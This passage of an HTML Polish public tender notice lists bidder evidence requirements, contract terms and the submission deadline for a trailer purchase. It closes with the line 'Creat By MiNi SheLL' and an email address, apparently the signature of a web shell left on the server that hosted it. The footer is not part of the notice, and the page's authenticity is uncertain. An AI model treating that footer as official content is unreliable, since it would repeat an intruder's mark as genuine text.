Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16.02.2007r. o ochronie konkurencji i konsumentów (Dz. U. z 2024 r. poz. 594), z innym wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu, niezależnie od innego wykonawcy należącego do tej samej grupy kapitałowej (wzór oświadczenia stanowi załącznik nr 8 do SWZ).</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1)	w celu potwierdzenia spełniania warunku udziału w postępowaniu dotyczącego zdolności technicznej lub zawodowej<br/>a)	wykaz dostaw wykonanych, a w przypadku świadczeń powtarzających się lub ciągłych również wykonywanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego dostawy zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy (wzór wykazu dostaw stanowi załącznik nr 7 do SWZ),</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 10.	Wykonawca składa wraz z ofertą następujące przedmiotowe środki dowodowe:<br/>11.	Opis przyczepy w formie folderu (zawierający fotografie poglądowe) oraz specyfikacje techniczną odpowiadającą wymogom opisanym w załączniku nr 9 do SWZ – SOZP.<br/>12.	Jeżeli Wykonawca nie przedłożył przedmiotowych środków dowodowych lub złożone przedmiotowe środki dowodowe są niekompletne, Zamawiający wzywa do ich złożenia lub uzupełnienia w wyznaczonym terminie.<br/>13.	Zamawiający może żądać od Wykonawców wyjaśnień dotyczących treści przedmiotowych środków dowodowych.<br/>14.	Przedmiotowe środki dowodowe sporządzone w języku obcym składa się wraz z tłumaczeniem na język polski.<br/>15.	W przypadku, gdy przedmiotowe środki dowodowe zostały wystawione przez upoważnione podmioty jako dokument w postaci papierowej, Wykonawca lub Wykonawca wspólnie ubiegający się o udzielenie zamówienia, przedłoży cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufanym lub podpisem osobistym przez osobę lub osoby upoważnione. Poświadczenia zgodności cyfrowego odwzorowania z dokumentem w postaci papierowej może dokonać również notariusz. <br/>16.	Przez cyfrowe odwzorowanie, o którym mowa powyżej, należy rozumieć dokument elektroniczny będący kopią elektroniczną treści zapisanej w postaci papierowej, umożliwiający zapoznanie się z tą treścią i jej zrozumienie, bez konieczności bezpośredniego dostępu do oryginału. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.10.) Przedmiotowe środki dowodowe podlegające uzupełnieniu po złożeniu oferty: </h3> 11.	Opis przyczepy w formie folderu (zawierający fotografie poglądowe) oraz specyfikacje techniczną odpowiadającą wymogom opisanym w załączniku nr 9 do SWZ – SOZP. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1.	Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2.	Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. <br/>3.	Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>4.	W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane lub usługi, do realizacji których te zdolności są wymagane. <br/>5.	W przypadku, o którym mowa w ust. 4 powyżej, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonają poszczególni Wykonawcy (wzór oświadczenia, o którym mowa w art. 117 ust. 4 ustawy Pzp stanowi załącznik nr 6 do SWZ). <br/>6.	W przypadku gdy podmiotowe środki dowodowe, przedmiotowe środki dowodowe, inne dokumenty, lub dokumenty potwierdzające umocowanie do reprezentowania odpowiednio Wykonawcy, Wykonawców wspólnie ubiegających się o udzielenie zamówienia publicznego, podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp lub podwykonawcy niebędącego podmiotem udostępniającym zasoby na takich zasadach, zwane dalej „dokumentami potwierdzającymi umocowanie do reprezentowania”, zostały wystawione przez upoważnione podmioty inne niż Wykonawca, Wykonawca wspólnie ubiegający się o udzielenie zamówienia, podmiot udostępniający zasoby lub podwykonawca, zwane dalej „upoważnionymi podmiotami”, jako dokument elektroniczny, przekazuje się ten dokument. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian oraz warunki ich wprowadzenia zostały określone w § 8 wzoru umowy, który stanowi załącznik nr 10 do SWZ. Zmiana umowy może nastąpić wyłącznie w formie pisemnego aneksu pod rygorem nieważności. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-03-06 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mzo_leszno/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-03-06 10:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Brak

Creat By MiNi SheLL
Email: jattceo@gmail.com